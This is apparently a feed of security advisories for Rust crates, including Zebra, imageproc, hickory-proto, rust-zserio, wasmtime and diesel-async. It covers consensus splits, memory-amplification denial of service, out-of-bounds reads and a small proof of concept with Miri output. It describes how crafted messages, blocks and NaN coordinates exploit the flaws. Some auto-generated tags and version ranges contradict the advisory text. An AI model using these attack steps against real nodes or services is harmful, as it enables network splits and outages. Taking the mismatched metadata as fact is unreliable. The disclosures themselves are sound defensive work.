- Zebra accepts the spend, zcashd rejects it, creating a consensus split in the network.

## Impact

**Consensus Failure**

- **Attack Vector:** Network.
- **Effect:** Network partition/consensus split.
- **Scope:** Any affected Zebra node, and any miner or template pipeline that relies on Zebra's validation result.

## Fixed Versions

This issue is fixed in 4.4.0. The fix uses a workaround where the input buffer is filled with random bytes on validation failure, which makes signature validation fail (as expected) with overwhelming probability. This avoids a breaking release of the `zcash_script` crate. A future release will propagate the error correctly for a direct fix.

## Mitigation

Users should upgrade to 4.4.0 or later immediately. There are no known workarounds for this issue. Immediate upgrade is the only way to ensure the node remains on the correct consensus path and is protected against malicious chain forks.

## Credits

Zebra thanks @sangsoo-osec for finding and reporting the issue.
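The stale-buffer hazard and the workaround can be sketched with simplified types (this is not Zebra's actual FFI bridge). Because the C++ side reads the output buffer unconditionally, the Rust callback must never leave a previously valid digest in place on failure:

```rust
/// Simplified stand-in for the FFI sighash callback. On success the
/// digest is written out; on failure the buffer is overwritten so a
/// stale digest from an earlier signature check cannot be reused.
fn sighash_callback(
    compute: impl Fn() -> Option<[u8; 32]>,
    sighash_out: &mut [u8; 32],
) {
    match compute() {
        Some(digest) => *sighash_out = digest,
        // Workaround shape: clobber the buffer so verification fails.
        // The real fix uses random bytes; a fixed sentinel keeps this
        // sketch deterministic and testable.
        None => *sighash_out = [0xFF; 32],
    }
}
```

The vulnerable version simply did nothing in the `None` arm, which is exactly how the `OP_CHECKSIGVERIFY`-then-`OP_CHECKSIG` sequence above verified against the stale digest.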

Affected versions

All versions < 6.0.0

Vulnerability type

CWE-347 — Improper Verification of Cryptographic Signature

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H

Unspecified
📦 zebra-network 🏢 zfnd 📌 All versions < 6.0.0 ⛓️‍💥 Supply chain attack 🦀 Rust library crates.io ⚡ Resource Exhaustion 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 # CVE-2026-44500: Allocation Amplification in Inbound Network Deserializers ## Summary Several inbound deserialization paths in Zebra allocated buffers sized against generic transport or block-size ceilings before the tighter protocol or consensus limits were enforced. An unaut...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

# CVE-2026-44500: Allocation Amplification in Inbound Network Deserializers

## Summary

Several inbound deserialization paths in Zebra allocated buffers sized against generic transport or block-size ceilings before the tighter protocol or consensus limits were enforced. An unauthenticated or post-handshake peer could therefore force the node to preallocate and parse orders of magnitude more data than the protocol intended, across `headers` messages, equihash solutions in block headers, Sapling spend vectors in V5/V4 transactions, and coinbase script bytes in blocks.

## Severity

**Moderate** - This is a denial-of-service vulnerability that could allow a malicious peer to amplify per-message memory and parse cost on Zebra nodes, with effects amplified by multi-peer fan-in. Each individual case is bounded by the 2 MiB transport ceiling or the block-size cap, so no single message causes unbounded allocation, but the cumulative gap between intended and actual limits is significant.

## Affected Versions

All Zebra versions prior to 4.4.0.

## Description

Zebra's network codec uses `TrustedPreallocate` and generic `Vec` deserialization to bound inbound message parsing. In several places the bound used at the deserializer was the generic transport or block-size ceiling rather than the tighter protocol or consensus rule that applies to the field, so allocation happened first and the real limit was only enforced afterwards. Four such cases were identified:

- **`headers` message receive cap.** `read_headers()` deserialized the `CountedHeader` vector via the generic `TrustedPreallocate` path, which allowed up to ~1,409 entries per message. The protocol ceiling `MAX_FIND_BLOCK_HEADERS_RESULTS = 160` was only used on the send side, giving an ~8.8x preallocation gap on receive. This is reachable before the version handshake completes, since the codec is installed on raw bytes.
- **Equihash solution length.** `Solution::zcash_deserialize` decoded the solution as a generic `Vec<u8>` and only checked the exact consensus size (1344 bytes mainnet/testnet, 36 bytes regtest) afterwards in `Solution::from_bytes`. A single fixed-size header field could be inflated to nearly the full block-size ceiling before rejection.
- **Sapling spend vectors in coinbase transactions.** V5 `spend_prefixes` and V4 `shielded_spends` were allocated generically with block-size-derived ceilings (~5,681 / ~5,208 entries) before the consensus rule that coinbase transactions have zero Sapling spends was enforced in the verifier.
- **Coinbase script bytes.** `Input::zcash_deserialize()` read the coinbase script as a generic `Vec<u8>` up to the message-size cap before enforcing the consensus rule that coinbase scripts are between 2 and 100 bytes.

An attacker could exploit this by:

- Opening an inbound TCP connection (and, for the latter three cases, completing the version handshake).
- Sending one of: a `headers` message with a CompactSize count up to ~1,409, a `block` whose header carries an inflated equihash CompactSize, a `tx` declaring a coinbase input with a large `nSpendsSapling`, or a `block` with a coinbase input whose script length is near the message-size ceiling.
- The deserializer allocates against the loose ceiling, parses, and only then rejects.

## Impact

**Denial of Service**

- **Attack Vector:** Network.
- **Effect:** Amplified per-message allocation and parse cost on inbound peer messages, stackable across concurrent connections. The concrete effect depends on how much memory Zebra has available.
- **Scope:** Any affected Zebra node.

## Fixed Versions

This issue is fixed in Zebra 4.4.0.

## Mitigation

Users should upgrade to Zebra 4.4.0 or later immediately. There are no known workarounds; immediate upgrade is the only way to remove the amplified allocation surface on inbound peer messages.

## Credits

Zebra thanks @Zk-nd3r for finding and reporting the issues.
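The receive-side fix common to all four cases has the same small shape: clamp the wire-declared count to the tightest applicable limit before reserving any memory. A minimal sketch with an invented function name (only the `MAX_FIND_BLOCK_HEADERS_RESULTS` value is taken from the advisory; this is not Zebra's actual code):

```rust
/// Illustrative only: clamp an untrusted wire count to the tightest
/// protocol limit before allocating (names are not Zebra's real API).
const MAX_FIND_BLOCK_HEADERS_RESULTS: usize = 160;

fn bounded_preallocation(declared: u64, protocol_max: usize) -> usize {
    // Reserve at most the protocol ceiling, no matter what the peer claims.
    declared.min(protocol_max as u64) as usize
}

fn main() {
    // A peer declares ~1,409 headers; we still reserve at most 160 slots.
    let reserve = bounded_preallocation(1409, MAX_FIND_BLOCK_HEADERS_RESULTS);
    let headers: Vec<[u8; 80]> = Vec::with_capacity(reserve);
    assert!(headers.capacity() >= reserve);
    assert_eq!(reserve, 160);
}
```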

Affected versions

All versions < 4.4.0

Vulnerability type

CWE-770 — Allocation of Resources Without Limits or Throttling

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Critical
📦 zebrad 🏢 zfnd 📌 All versions < 4.4.0 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io ⚡ CWE-682 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 Zebra's block validator undercounts transparent signature operations against the 20000-sigop block limit (`MAX_BLOCK_SIGOPS`), allowing it to accept blocks that `zcashd` rejects with `bad-blk-sigops`. A miner who produces such a block can split the network: Zebra nodes follow the...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

Zebra's block validator undercounts transparent signature operations against the 20000-sigop block limit (`MAX_BLOCK_SIGOPS`), allowing it to accept blocks that `zcashd` rejects with `bad-blk-sigops`. A miner who produces such a block can split the network: Zebra nodes follow the offending chain while `zcashd` nodes do not. There are two distinct undercounts:

#### A: Coinbase Hidden Legacy Sigops

`zcashd`'s `GetLegacySigOpCount()` includes the coinbase input's `scriptSig`. Zebra's `Sigops` impl skipped the coinbase input entirely, so up to ~98 sigops (the 100-byte coinbase script length cap, less the height prefix) could be hidden inside the coinbase `scriptSig` without being charged against the block limit.

#### B: Aggregate P2SH Sigops

`zcashd`'s `GetP2SHSigOpCount()` parses each P2SH input's redeem script with `accurate=true` and sums those sigops into the block-wide total via `ConnectBlock`. The check is per-block, not per-transaction, and the limit applies regardless of who mines the offending block — a miner just needs to include enough P2SH-spending transactions whose redeem scripts together exceed 20000 sigops. Zebra computed P2SH sigops only on the mempool-acceptance path (used for ZIP-317 weighting) and never accumulated them during block validation. A block whose aggregate redeem-script sigops exceed 20000 (e.g. 1334 P2SH spends × 15 sigops = 20010) would be accepted by Zebra and rejected by `zcashd`.

### Patches

Fixed in this release: https://github.com/ZcashFoundation/zebra/releases/tag/v4.4.0.

### Workarounds

None. Operators relying on Zebra for consensus should upgrade.

### Resources

- `MAX_BLOCK_SIGOPS` constant inherited from Bitcoin via the Zcash protocol spec's §7.6 catch-all "Other rules inherited from Bitcoin", tracked for explicit documentation in [zcash/zips#568](https://github.com/zcash/zips/issues/568).
- `zcashd` `GetLegacySigOpCount`: <https://github.com/zcash/zcash/blob/v6.11.0/src/main.cpp#L826-L836>
- `zcashd` `GetP2SHSigOpCount`: <https://github.com/zcash/zcash/blob/v6.11.0/src/main.cpp#L840-L852>
- `zcashd` `ConnectBlock` aggregates per-tx sigops and compares against `MAX_BLOCK_SIGOPS`.
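The corrected accounting can be sketched as follows. This is a deliberate simplification: the opcode byte values are the real Bitcoin ones, but a faithful counter must iterate decoded opcodes (skipping pushdata payloads) rather than raw bytes, and the function names here are invented:

```rust
const OP_CHECKSIG: u8 = 0xac;
const OP_CHECKSIGVERIFY: u8 = 0xad;
const OP_CHECKMULTISIG: u8 = 0xae;
const OP_CHECKMULTISIGVERIFY: u8 = 0xaf;

// Count sigops in one script; multisig is charged the worst case of 20
// keys, matching non-"accurate" legacy counting. Simplified: a real
// implementation must skip pushdata payloads instead of scanning bytes.
fn legacy_sigop_count(script: &[u8]) -> u64 {
    script
        .iter()
        .map(|&op| match op {
            OP_CHECKSIG | OP_CHECKSIGVERIFY => 1,
            OP_CHECKMULTISIG | OP_CHECKMULTISIGVERIFY => 20,
            _ => 0,
        })
        .sum()
}

// The fix the advisory describes: charge every input's scriptSig,
// including the coinbase, against the block-wide budget.
fn block_legacy_sigops<'a>(script_sigs: impl Iterator<Item = &'a [u8]>) -> u64 {
    script_sigs.map(legacy_sigop_count).sum()
}

fn main() {
    let coinbase_script_sig: &[u8] = &[OP_CHECKSIG; 10]; // 10 hidden sigops
    let other_input: &[u8] = &[OP_CHECKMULTISIG];        // worst case: 20
    let total = block_legacy_sigops([coinbase_script_sig, other_input].into_iter());
    assert_eq!(total, 30);
}
```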

Affected versions

All versions < 4.4.0

Vulnerability type

CWE-682 — Incorrect Calculation

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N

Unspecified
📦 imageproc 📌 All versions < 0.23.1 🖥️ Operating system 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 A bounds verification of a slice storage of a 2-dimensional matrix's coefficients (a kernel) would compare the total size against the product of individual dimensions. This would erroneously cast *after* the multiplication and consequently fail to detect possible violations when ...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

A bounds check on the slice storing a 2-dimensional matrix's coefficients (a kernel) compared the total size against the product of the individual dimensions. The cast to a wider type was erroneously performed *after* the multiplication, so the check failed to detect violations when the multiplication overflowed. Afterwards, the individual dimensions were trusted to constrain coordinates within the matrix to indices valid for the underlying storage. With a crafted `Kernel` object, certain combinations of coordinates could then cause an out-of-bounds access in an `unsafe` function while still fulfilling its documented preconditions. The kernel value could be passed to library functions that trusted those preconditions and then performed such reads.
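The overflow class can be reproduced in a few lines. This sketch is illustrative (the function names are invented, not imageproc's API): the buggy check multiplies in `u32` and casts afterwards, so a wrapped product lets an undersized buffer pass.

```rust
// The buggy check multiplies in u32 (wrapping_mul emulates the wraparound
// a release build produces) and casts only afterwards.
fn len_matches_buggy(w: u32, h: u32, len: usize) -> bool {
    w.wrapping_mul(h) as usize == len
}

// The fix: widen first and use checked multiplication before comparing.
fn len_matches_fixed(w: u32, h: u32, len: usize) -> bool {
    (w as usize).checked_mul(h as usize) == Some(len)
}

fn main() {
    // 2^16 * 2^16 wraps to 0 in u32, so an empty buffer "fits" a huge kernel.
    assert!(len_matches_buggy(1 << 16, 1 << 16, 0));
    assert!(!len_matches_fixed(1 << 16, 1 << 16, 0));
    assert!(len_matches_fixed(3, 4, 12));
}
```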

Affected versions

All versions < 0.23.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

Unspecified
📦 imageproc 📌 All versions < 0.23.1 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 A bounds check was performed in floating points before a cast to the index passed to an unchecked access function. This checked considered `NaN` cases improperly, causing them to succeed the check instead of failing it. The floating point coordinate is under caller control by pas...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

A bounds check was performed in floating point before the cast to the index passed to an unchecked access function. The check handled `NaN` improperly, causing `NaN` values to pass the check instead of failing it. The floating-point coordinate is under caller control via a chosen projection matrix. By carefully controlling the coordinates of an image with no data and one non-zero dimension, an attacker gains an arbitrary read primitive within the first 32 bits of address space with the bilinear sampling method. Using bicubic sampling can result in a read of a few bytes beyond an allocation. Other out-of-bounds reads may be possible.
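The failure mode is ordinary IEEE 754 comparison semantics: every comparison with `NaN` is false, so a negated ("not out of bounds") check accepts `NaN`. A minimal illustration with hypothetical function names:

```rust
// Buggy: "not out of bounds". NaN fails both sub-comparisons, so the
// negation makes the whole check succeed.
fn in_bounds_buggy(x: f32, width: f32) -> bool {
    !(x < 0.0 || x >= width)
}

// Fixed: positive form. NaN fails `x >= 0.0`, so the check fails.
fn in_bounds_fixed(x: f32, width: f32) -> bool {
    x >= 0.0 && x < width
}

fn main() {
    assert!(in_bounds_buggy(f32::NAN, 100.0));  // NaN slips through
    assert!(!in_bounds_fixed(f32::NAN, 100.0)); // NaN rejected
    assert!(in_bounds_fixed(50.0, 100.0));
}
```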

Affected versions

All versions < 0.23.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

Unspecified
📦 imageproc 📌 All versions < 0.24.0 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 A read of pixels was coded as modifying coordinates to lie within the image bounds. It would calculate a coordinate by adding a constant to an input and taking the minimum of the resulting coordinate and 'dimension - 1'. This would not protect against malicious inputs that could ...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

A pixel-read routine clamped coordinates to lie within the image bounds: it computed a coordinate by adding a constant to an input and taking the minimum of the result and `dimension - 1`. This did not protect against malicious inputs that could overflow the addition. Once the bounds check had been defeated in this way, the image could be sampled at several differently calculated coordinates that exceeded the bounds.
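The defeated clamp can be sketched as follows, with `wrapping_add` standing in for release-mode overflow; the names are illustrative, not imageproc's API. Because the wrapped sum no longer reflects the true offset, later sampling steps that derive neighbouring coordinates from the raw input can land outside the image:

```rust
// Buggy: the addition wraps (wrapping_add emulates release-mode overflow)
// before the clamp, so the "clamped" coordinate is unrelated to x + k.
fn clamp_buggy(x: u32, k: u32, dim: u32) -> u32 {
    x.wrapping_add(k).min(dim - 1)
}

// Fixed: saturate the addition so the clamp sees a meaningful value.
fn clamp_fixed(x: u32, k: u32, dim: u32) -> u32 {
    x.saturating_add(k).min(dim - 1)
}

fn main() {
    // x near u32::MAX wraps past zero: the buggy clamp yields 2, not 99.
    assert_eq!(clamp_buggy(u32::MAX, 3, 100), 2);
    assert_eq!(clamp_fixed(u32::MAX, 3, 100), 99);
    assert_eq!(clamp_fixed(10, 3, 100), 13);
}
```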

Affected versions

All versions < 0.24.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

Unspecified
📦 hickory-proto 📌 All versions < 0.26.1 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 During message encoding, `hickory-proto`'s `BinEncoder` stores pointers to labels that are candidates for name compression in a `Vec<(usize, Vec<u8>)>`. The name compression logic then searches for matches with a linear scan. A malicious message with many records can both introd...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

During message encoding, `hickory-proto`'s `BinEncoder` stores pointers to labels that are candidates for name compression in a `Vec<(usize, Vec<u8>)>`. The name compression logic then searches for matches with a linear scan. A malicious message with many records can both introduce many candidate labels and invoke this linear scan many times, amplifying CPU exhaustion in DoS attacks. This is similar to [CVE-2024-8508](https://www.nlnetlabs.nl/downloads/unbound/CVE-2024-8508.txt).

### Reporter

Qifan Zhang, Palo Alto Networks
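One common remedy for this pattern, sketched here with invented names rather than hickory's actual types, is to key previously emitted names by their serialised bytes, so each lookup is an amortised O(1) hash probe instead of a scan over every prior label:

```rust
use std::collections::hash_map::Entry;
use std::collections::HashMap;

// Offsets of previously emitted names, keyed by their serialised labels.
#[derive(Default)]
struct CompressionTable {
    offsets: HashMap<Vec<u8>, usize>,
}

impl CompressionTable {
    /// Return the offset of an earlier identical name (a compression
    /// pointer target), or record this one for future pointers.
    fn lookup_or_insert(&mut self, labels: &[u8], offset: usize) -> Option<usize> {
        match self.offsets.entry(labels.to_vec()) {
            Entry::Occupied(e) => Some(*e.get()),
            Entry::Vacant(e) => {
                e.insert(offset);
                None
            }
        }
    }
}

fn main() {
    let mut table = CompressionTable::default();
    // First occurrence: no pointer available yet, emit the full name.
    assert_eq!(table.lookup_or_insert(b"\x07example\x03com\x00", 12), None);
    // Second occurrence: compress with a pointer to offset 12.
    assert_eq!(table.lookup_or_insert(b"\x07example\x03com\x00", 40), Some(12));
}
```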

Affected versions

All versions < 0.26.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

High
📦 hickory-proto 📌 0.25.0-alpha.3 → 0.25.2 and 0.26.0-alpha.1 → 0.26.0 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited
💬 The NSEC3 closest-encloser proof validation in `hickory-proto`'s (0.25.0-alpha.3 ... 0.25.2) and `hickory-net`'s (0.26.0-alpha.1 .. 0.26.0) `DnssecDnsHandle` walks from the QNAME up to the SOA owner name, building a list of candidate encloser names. The iterator used assumes the...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

The NSEC3 closest-encloser proof validation in `hickory-proto`'s (0.25.0-alpha.3 ... 0.25.2) and `hickory-net`'s (0.26.0-alpha.1 .. 0.26.0) `DnssecDnsHandle` walks from the QNAME up to the SOA owner name, building a list of candidate encloser names. The iterator used assumes the QNAME is a descendant of the SOA owner, terminating only when the current candidate equals the SOA name. When the SOA in a response's authority section is not an ancestor of the QNAME, the loop stalls at the DNS root and never terminates, repeatedly calling `Name::base_name()` and pushing newly allocated `Name` and hashed-name entries into the candidate `Vec`.

The bug is reachable by any caller of `DnssecDnsHandle`, including the resolver, recursor, and client, when built with the `dnssec-ring` or `dnssec-aws-lc-rs` feature and configured to perform DNSSEC validation. It is triggered while validating a NoData or NXDomain response whose authority section contains an SOA record from a zone other than an ancestor of the QNAME, on a code path that requires NSEC3 closest-encloser proof. In practice this can be reached through an insecure CNAME chain that crosses zone boundaries into a DNSSEC-signed zone returning NoData, but the minimum condition is just a mismatched SOA owner on a response requiring NSEC3 validation.

A `debug_assert_ne!(name, Name::root())` guards the loop body, so debug builds abort with a panic on the first iteration past the root. Release builds compile the assertion out and run the loop unbounded, allocating until the process exhausts available memory. A reachable upstream attacker who can return such a response can therefore crash a debug build or exhaust memory on a release build, for the affected configurations.

The affected code was migrated from `hickory-proto` to `hickory-net` as part of the 0.26.0 release. Hickory DNS recommends that all affected users update to `hickory-net` 0.26.1 for the fix.

### Reporter

David Cook, ISRG
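The termination bug can be modelled with plain strings (this toy is not hickory's `Name` API): the fixed walk must treat reaching the root as a terminal condition rather than asserting it never happens:

```rust
// Toy name model: dot-separated labels; "" plays the role of the DNS root.
fn base_name(name: &str) -> &str {
    match name.split_once('.') {
        Some((_, rest)) => rest,
        None => "",
    }
}

/// Collect candidate enclosers from `qname` up to `apex`, refusing to
/// loop past the root when `apex` is not actually an ancestor.
fn candidates(qname: &str, apex: &str) -> Option<Vec<String>> {
    let mut out = Vec::new();
    let mut cur = qname;
    loop {
        out.push(cur.to_string());
        if cur == apex {
            return Some(out); // normal termination at the zone apex
        }
        if cur.is_empty() {
            return None; // hit the root: apex was no ancestor, stop
        }
        cur = base_name(cur);
    }
}

fn main() {
    // Apex is an ancestor: bounded walk with three candidates.
    assert_eq!(candidates("a.b.example", "example").unwrap().len(), 3);
    // Mismatched SOA owner: bounded failure instead of an unbounded loop.
    assert!(candidates("a.b.example", "other.zone").is_none());
}
```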

Affected versions

0.25.0-alpha.3 → 0.25.2 and 0.26.0-alpha.1 → 0.26.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

High
📦 rust-zserio 📌 All versions < 0.5.4 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Impact When deserializing arrays, strings or bytes (blob) types zserio first reads the size of the variable, and then allocates sufficient memory to load data. Since the size is always trusted this can be abused by creating a data file with a large size value, causing the zs...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

### Impact

When deserializing array, string, or bytes (blob) types, zserio first reads the size of the variable and then allocates sufficient memory to load the data. Since the size is always trusted, this can be abused by creating a data file with a large size value, causing the zserio runtime to allocate large amounts of memory.

### Patches

Please cherry-pick [57f5fb](https://github.com/Danaozhong/rust-zserio/commit/57f5fb4a2a8611d58dbcc1a9221349206dd99c3c).

### Workarounds

- Do not accept `zserio`-encoded messages from non-trusted sources.
- Allocate a maximum heap amount to `rust-zserio` to avoid impacting other applications.
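A defensive deserialisation shape for this class of bug, using only the standard library and invented names: validate the declared length against a configured maximum, then let the buffer grow only as bytes actually arrive instead of preallocating the declared size:

```rust
use std::io::{Cursor, Read};

// Illustrative sketch, not rust-zserio's API: read a length-prefixed blob
// without ever trusting the declared length for an up-front allocation.
fn read_blob<R: Read>(reader: R, declared_len: u64, max_len: u64) -> std::io::Result<Vec<u8>> {
    if declared_len > max_len {
        return Err(std::io::Error::new(
            std::io::ErrorKind::InvalidData,
            "declared length exceeds configured maximum",
        ));
    }
    let mut buf = Vec::new(); // grows only as bytes actually arrive
    reader.take(declared_len).read_to_end(&mut buf)?;
    if buf.len() as u64 != declared_len {
        return Err(std::io::Error::new(
            std::io::ErrorKind::UnexpectedEof,
            "truncated payload",
        ));
    }
    Ok(buf)
}

fn main() {
    let ok = read_blob(Cursor::new(vec![1u8, 2, 3]), 3, 1024).unwrap();
    assert_eq!(ok, vec![1, 2, 3]);
    // A message claiming a 1 GiB payload is rejected before any allocation.
    assert!(read_blob(Cursor::new(vec![0u8; 4]), 1 << 30, 1024).is_err());
}
```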

Affected versions

All versions < 0.5.4

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Unspecified
📦 wasmtime 📌 30.0.0 → 36.0.8 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Impact Wasmtime's allocation logic for a WebAssembly table contained checked arithmetic which panicked on overflow. This overflow is possible to trigger, and thus panic, when a table with an extremely large size is allocated. This is possible with the WebAssembly memory64 pr...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

### Impact

Wasmtime's allocation logic for a WebAssembly table contained checked arithmetic which panicked on overflow. This overflow is possible to trigger, and thus panic, when a table with an extremely large size is allocated. This is possible with the WebAssembly memory64 proposal, where tables can have sizes in the 64-bit range as opposed to the previous 32-bit range, which would not overflow.

The panic happens when attempting to create a very large table, such as when instantiating a WebAssembly module or component. This bug does not affect the pooling allocator, which limits table sizes to much less than the amount required to trigger the overflow. This bug is only present for the on-demand instance allocator, which is Wasmtime's default allocator. This bug also requires the `memory64` WebAssembly feature to be enabled, which is on-by-default. Panicking in the host process is considered a denial-of-service vector for Wasmtime.

### Patches

Wasmtime 36.0.8, 43.0.2, and 44.0.1 have all been released, which fix this issue.

### Workarounds

Embeddings can switch to using the pooling allocator to work around this issue, or the `memory64` WebAssembly proposal can be disabled. Otherwise there is no workaround and users are recommended to upgrade.
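The general fix shape, with invented names and an assumed element size rather than Wasmtime's real allocator code, is to propagate the overflow as a recoverable error instead of unwrapping it into a panic:

```rust
// Illustrative constant: bytes per table element (not Wasmtime's value).
const ELEMENT_SIZE: u64 = 8;

// Checked arithmetic that surfaces overflow as an Err the embedder can
// handle, rather than a host-process panic.
fn table_alloc_size(elements: u64) -> Result<u64, String> {
    elements
        .checked_mul(ELEMENT_SIZE)
        .ok_or_else(|| "table size overflows the address space".to_string())
}

fn main() {
    assert_eq!(table_alloc_size(1024), Ok(8192));
    // A memory64-range table size yields an error instead of a panic.
    assert!(table_alloc_size(u64::MAX / 2).is_err());
}
```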

Affected versions

30.0.0 → 36.0.8

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Low
📦 diesel-async 📌 All versions < 0.9.0 🗃️ Database 🦀 Rust library crates.io 🎯 Local ⚪ Not exploited 🟢 Patched
💬 ### Summary diesel-async exposes uninitialized stack padding to safe code on every read of a MySQL `DATE`, `TIME`, `DATETIME`, or `TIMESTAMP` column. Reading that buffer is undefined behavior, and the leaked bytes can contain stale heap/stack contents, so this is both a soundnes...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

### Summary

diesel-async exposes uninitialized stack padding to safe code on every read of a MySQL `DATE`, `TIME`, `DATETIME`, or `TIMESTAMP` column. Reading that buffer is undefined behavior, and the leaked bytes can contain stale heap/stack contents, so this is both a soundness bug and a potential information-disclosure vector.

### Details

In `diesel-async/src/mysql/row.rs` (lines 65-103), `MysqlRow::get` builds a `MysqlTime` from the parsed `mysql_async::Value` and then fabricates the byte buffer that downstream `FromSql` impls expect like this:

```rust
let date = MysqlTime::new(/* fields from Value::Date / Value::Time */);
let buffer = unsafe {
    let ptr = &date as *const MysqlTime as *const u8;
    let slice = std::slice::from_raw_parts(ptr, std::mem::size_of::<MysqlTime>());
    slice.to_vec()
};
```

`MysqlTime` is `#[repr(C)]` with 3 bytes of padding after `bool neg` (Linux x86_64, offsets 0x21..0x23). The literal construction leaves that padding uninitialized, and `to_vec()` carries it into a `Vec<u8>` that becomes the `MysqlValue`'s backing buffer, reachable from safe code via `MysqlValue::as_bytes() -> &[u8]`.

`diesel` itself avoids this by going through `MaybeUninit::<MysqlTime>::zeroed()` + `ptr::copy_nonoverlapping` (see `diesel/src/mysql/value.rs:43-94`); the same pattern would fix this. Alternatively, write the bytes diesel's `FromSql` reads without round-tripping through a `MysqlTime` value.
### PoC

`Cargo.toml`:

```toml
[dependencies]
diesel = { version = "~2.3.0", default-features = false, features = ["mysql_backend"] }
diesel-async = { version = "=0.8.0", features = ["mysql"] }
mysql_common = { version = "0.35", default-features = false }
```

`src/main.rs`:

```rust
use diesel::row::{Field, Row};
use diesel_async::{AsyncConnectionCore, AsyncMysqlConnection};
use mysql_common::{constants::ColumnType, packets::Column, prelude::FromRow, value::Value};

type MysqlRow = <AsyncMysqlConnection as AsyncConnectionCore>::Row<'static, 'static>;

fn main() {
    let cols = std::sync::Arc::from([Column::new(ColumnType::MYSQL_TYPE_DATE)]);
    let raw = mysql_common::row::new_row(vec![Value::Date(2024, 1, 1, 0, 0, 0, 0)], cols);
    let row: MysqlRow = FromRow::from_row(raw);
    let field = row.get(0).unwrap();
    let bytes = field.value().unwrap().as_bytes();
    let _: u64 = bytes.iter().map(|&b| b as u64).sum(); // UB: hits padding
}
```

Miri output:

```text
error: Undefined Behavior: reading memory at alloc844[0x21..0x22], but memory is uninitialized at [0x21..0x22], and this operation requires initialized memory
  --> src/main.rs:14:37
   |
14 |     let _: u64 = bytes.iter().map(|&b| b as u64).sum(); // UB: hits padding
   |                                     ^ Undefined Behavior occurred here
   |
   = help: this indicates a bug in the program: it performed an invalid operation, and caused Undefined Behavior
   = help: see https://doc.rust-lang.org/nightly/reference/behavior-considered-undefined.html for further information
   = note: stack backtrace:
   0: main::{closure#0}
      at src/main.rs:14:37: 14:38
   1: std::iter::adapters::map::map_fold::<&u8, u64, u64, {closure@src/main.rs:14:35: 14:39}, {closure@<u64 as std::iter::Sum>::sum<std::iter::Map<std::slice::Iter<'_, u8>, {closure@src/main.rs:14:35: 14:39}>>::{closure#0}}>::{closure#0}
      at /home/paolobarbolini/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/iter/adapters/map.rs:88:28: 88:34
   2: <std::slice::Iter<'_, u8> as std::iter::Iterator>::fold::<u64, {closure@std::iter::adapters::map::map_fold<&u8, u64, u64, {closure@src/main.rs:14:35: 14:39}, {closure@<u64 as std::iter::Sum>::sum<std::iter::Map<std::slice::Iter<'_, u8>, {closure@src/main.rs:14:35: 14:39}>>::{closure#0}}>::{closure#0}}>
      at /home/paolobarbolini/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/slice/iter/macros.rs:279:27: 279:85
   3: <std::iter::Map<std::slice::Iter<'_, u8>, {closure@src/main.rs:14:35: 14:39}> as std::iter::Iterator>::fold::<u64, {closure@<u64 as std::iter::Sum>::sum<std::iter::Map<std::slice::Iter<'_, u8>, {closure@src/main.rs:14:35: 14:39}>>::{closure#0}}>
      at /home/paolobarbolini/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/iter/adapters/map.rs:128:9: 128:50
   4: <u64 as std::iter::Sum>::sum::<std::iter::Map<std::slice::Iter<'_, u8>, {closure@src/main.rs:14:35: 14:39}>>
      at /home/paolobarbolini/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/iter/traits/accum.rs:52:17: 56:18
   5: <std::iter::Map<std::slice::Iter<'_, u8>, {closure@src/main.rs:14:35: 14:39}> as std::iter::Iterator>::sum::<u64>
